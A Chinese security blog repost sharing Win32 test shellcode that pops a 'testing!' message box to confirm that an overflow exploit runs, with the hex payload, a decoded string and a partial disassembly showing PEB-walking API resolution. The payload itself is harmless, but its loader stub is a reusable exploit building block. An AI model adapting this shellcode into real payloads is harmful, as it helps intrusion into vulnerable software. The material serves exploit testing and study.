Win32 Show Msgbox 【Testing!】ShellCode

admin
admin
admin
101017
文章
87
评论
2021年4月3日18:56:17评论50 views字数 3011阅读10分2秒阅读模式

Win32 Show Msgbox Testing! ShellCode:

    Win32 Show Msgbox Testing! ShellCode,一段平时用测试溢出执行用的ShellCode,弹出来一个Msgbox框框,就说明执行成功了。大家可能用不着,还是发出来吧。

ShellCode:

FC686A0A381E686389D14F683274910C8BF48D7EF433DBB7042BE366BB33325368757365725433D2648B5A308B4B0C8B491C8B098B6908AD3D6A0A381E750595FF57F895608B453C8B4C057803CD8B592003DD33FF478B34BB03F5990FBE063AC47408C1CA0703D046EBF13B54241C75E48B592403DD668B3C7B8B591C03DD032CBB955FAB57613D6A0A381E75A933DB5368696E672168746573748BC453505053FF57FC53FF57F8

对应的十六进制转字符串的数值:

黨j
8hc壯Oh2t?嬼崀?鄯+鉬?2ShuserT3襠媄0婯 婭?媔?j
8u?W鴷`婨
8u?跾hing!htest嬆SPPSW黃W

    上文加粗的字体中的字符串为:弹出来的对话框的内容。格式为:每隔四个字节加上字符“h”并倒叙写入。例如:【hing!htest】,分割后变为:【hing!】【htest】,去掉字符“h”:【ing!】【test】,再每隔四个字节倒过来组合既是:【testing!】。

对应的汇编语句:

00000048:  8B4C05 78                  MOV ECX, [DWORD SS:EBP+EAX+78]
0000004C:  03CD                       ADD ECX, EBP
0000004E:  8B59 20                    MOV EBX, [DWORD DS:ECX+20]
00000051:  03DD                       ADD EBX, EBP
00000053:  33FF                       XOR EDI, EDI
00000055:  47                         INC EDI
00000056:  8B34BB                     MOV ESI, [DWORD DS:EBX+EDI*4]
00000059:  03F5                       ADD ESI, EBP
0000005B:  99                         CDQ
0000005C:  0FBE06                     MOVSX EAX, [BYTE DS:ESI]
0000005F:  3AC4                       CMP AL, AH
00000061:  74 08                      JE SHORT 0000006B
00000063:  C1CA 07                    ROR EDX, 7
00000066:  03D0                       ADD EDX, EAX
00000068:  46                         INC ESI
00000069:  EB F1                      JMP SHORT 0000005C
0000006B:  3B5424 1C                  CMP EDX, [DWORD SS:ESP+1C]
0000006F:  75 E4                      JNZ SHORT 00000055
00000071:  8B59 24                    MOV EBX, [DWORD DS:ECX+24]
00000074:  03DD                       ADD EBX, EBP
00000076:  66:8B3C7B                  MOV DI, [WORD DS:EBX+EDI*2]
0000007A:  8B59 1C                    MOV EBX, [DWORD DS:ECX+1C]
0000007D:  03DD                       ADD EBX, EBP
0000007F:  032CBB                     ADD EBP, [DWORD DS:EBX+EDI*4]
00000082:  95                         XCHG EAX, EBP
00000083:  5F                         POP EDI
00000084:  AB                         STOS [DWORD ES:EDI]
00000085:  57                         PUSH EDI
00000086:  61                         POPAD
00000087:  3D 6A0A381E                CMP EAX, 1E380A6A
0000008C:  75 A9                      JNZ SHORT 00000037
0000008E:  33DB                       XOR EBX, EBX
00000090:  53                         PUSH EBX
00000091:  68 696E6721                PUSH 21676E69
00000096:  68 74657374                PUSH 74736574
0000009B:  8BC4                       MOV EAX, ESP
0000009D:  53                         PUSH EBX
0000009E:  50                         PUSH EAX
0000009F:  50                         PUSH EAX
000000A0:  53                         PUSH EBX
000000A1:  FF57 FC                    CALL NEAR [DWORD DS:EDI-4]
000000A4:  53                         PUSH EBX
000000A5:  FF57 F8                    CALL NEAR [DWORD DS:EDI-8]

文章来源于lcx.cc:Win32 Show Msgbox 【Testing!】ShellCode

相关推荐: 物理攻击?那些年我们忽略掉的一些社会工程学手段

笔者自己也不太明白,也没资格给某种手法进行命名,暂且把这种“非主流的社工和渗透攻击结合”的方式成为物理攻击吧。 首先,做个小小的声明:文章里提到这个朋友虽然从事相关工作,但是却是正义的,也很乐于我将他知道公布出来,即便是以爆料的形式。再者,文正中提到的案例确实…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:56:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Win32 Show Msgbox 【Testing!】ShellCodehttps://cn-sec.com/archives/319292.html

发表评论

匿名网友 填写信息